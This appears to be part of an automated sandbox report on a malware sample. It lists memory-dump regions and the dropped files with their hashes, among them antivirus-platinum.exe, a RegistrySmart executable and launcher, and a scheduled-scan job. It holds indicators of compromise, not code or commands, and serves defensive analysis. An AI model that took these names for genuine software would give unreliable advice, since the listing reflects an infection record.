SHA512 d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

memory/3328-81-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1020-83-0x0000000005E00000-0x0000000005E50000-memory.dmp

memory/1020-84-0x0000000005F50000-0x000000000609A000-memory.dmp

memory/4000-91-0x0000000003960000-0x0000000003961000-memory.dmp

memory/4000-92-0x0000000000FA0000-0x00000000019E4000-memory.dmp

memory/4000-90-0x0000000003950000-0x0000000003951000-memory.dmp

memory/4000-89-0x0000000003940000-0x0000000003941000-memory.dmp

memory/4000-88-0x0000000003720000-0x0000000003721000-memory.dmp

memory/4000-87-0x00000000036E0000-0x00000000036E1000-memory.dmp

memory/4000-86-0x0000000000F90000-0x0000000000F91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E186.tmp\302746537.bat

MD5 7d8beb22dfcfacbbc2609f88a41c1458
SHA1 52ec2b10489736b963d39a9f84b66bafbf15685f
SHA256 4aa9ed4b38514f117e6e4f326cb0a1be7f7b96199e21305e2bd6dce289d7baa2
SHA512 a26cf9168cf7450435a9fe8942445511f6fda1087db52bd73e335d6f5b544fc892999019d9291d9dcc60c3656de49688f6d63282c97706e2db286f988e44fd94

\??\c:\windows\comctl32.ocx

MD5 821511549e2aaf29889c7b812674d59b
SHA1 3b2fd80f634a3d62277e0508bedca9aae0c5a0d6
SHA256 f59cdf89f0f522ce3662e09fa847bca9b277b006c415dcc0029b416c347db9c4
SHA512 8b2e805b916e5fbfcccb0f4189372aea006789b3847b51018075187135e9b5db9098f704c1932623f356db0ee327e1539a9bf3729947e92844a26db46555e8cd

memory/3304-110-0x0000000180000000-0x000000018008C000-memory.dmp

\??\c:\windows\mscomctl.ocx

MD5 714cf24fc19a20ae0dc701b48ded2cf6
SHA1 d904d2fa7639c38ffb6e69f1ef779ca1001b8c18
SHA256 09f126e65d90026c3f659ff41b1287671b8cc1aa16240fc75dae91079a6b9712
SHA512 d375fd9b509e58c43355263753634368fa711f02a2235f31f7fa420d1ff77504d9a29bb70ae31c87671d50bd75d6b459379a1550907fbe5c37c60da835c60bc1

C:\Windows\antivirus-platinum.exe

MD5 cd1800322ccfc425014a8394b01a4b3d
SHA1 171073975effde1c712dfd86309457fd457aed33
SHA256 8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0
SHA512 92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6

memory/1348-115-0x0000000000400000-0x000000000040D000-memory.dmp

memory/3328-121-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1348-123-0x0000000000400000-0x000000000040D000-memory.dmp

memory/812-125-0x0000000000220000-0x0000000000234000-memory.dmp

memory/920-126-0x0000000000400000-0x0000000000415000-memory.dmp

memory/3768-128-0x0000000000400000-0x00000000004B4000-memory.dmp

memory/3116-127-0x0000000000400000-0x0000000000A06000-memory.dmp

C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe

MD5 b13f9d8e3d5c88f0ddad896d7fe33a88
SHA1 e6d7dd65a85a4f97baa56ae8eb810918ff4d84fd
SHA256 6d6bd6a03387c3f3900b4b5fc1264c73b362698bf42b668b99d0e9b65f1d7663
SHA512 3319c68b7eebe4fe5d4e385cd91226c827668d87751c5b94a2f1aac24b588e83390a349185fc9d430d1eea2e356fbcaa6543b4a5f8e25d875da7deec30c56164

memory/3768-157-0x0000000000400000-0x00000000004B4000-memory.dmp

memory/920-160-0x0000000000400000-0x0000000000415000-memory.dmp

C:\Program Files (x86)\RegistrySmart\Launcher.exe

MD5 412a943768c74c06db9955d8cba40ed4
SHA1 e75a8b91bc28187edfb847c46a3d763bdb89b2cf
SHA256 8537ad8b3b76f4852c3402592e7b5b7b6d39f3477e9bc5fbe7d8af3c94d3865c
SHA512 c924dff545961ddcbd4e5ca56af1a6862e5e9f596c1f830edc2c022947cecc5c59ce72f60b7a38c3f3d32503ae349565419daa5164bd2e96d13f19736b17c4b4

C:\Windows\Tasks\RegistrySmart Scheduled Scan.job

MD5 53f046f358d642e23a7cee4d6c292c1e
SHA1 7a71d52dc8df7521fc4d22bf2da24f9c88f29588
SHA256 dbd2f74042446762c27940622d2945be179c13f09f0032773ae67044457a2228
SHA512 425a303a193fdd86cb655ba715a12e7159cd491a8eb35dcfaec6bb8a939aa5038b17739bf4293196ee7ac6441b9549054200d54fe56fc64c19c19beed7aa746b

memory/3116-167-0x0000000000400000-0x0000000000A06000-memory.dmp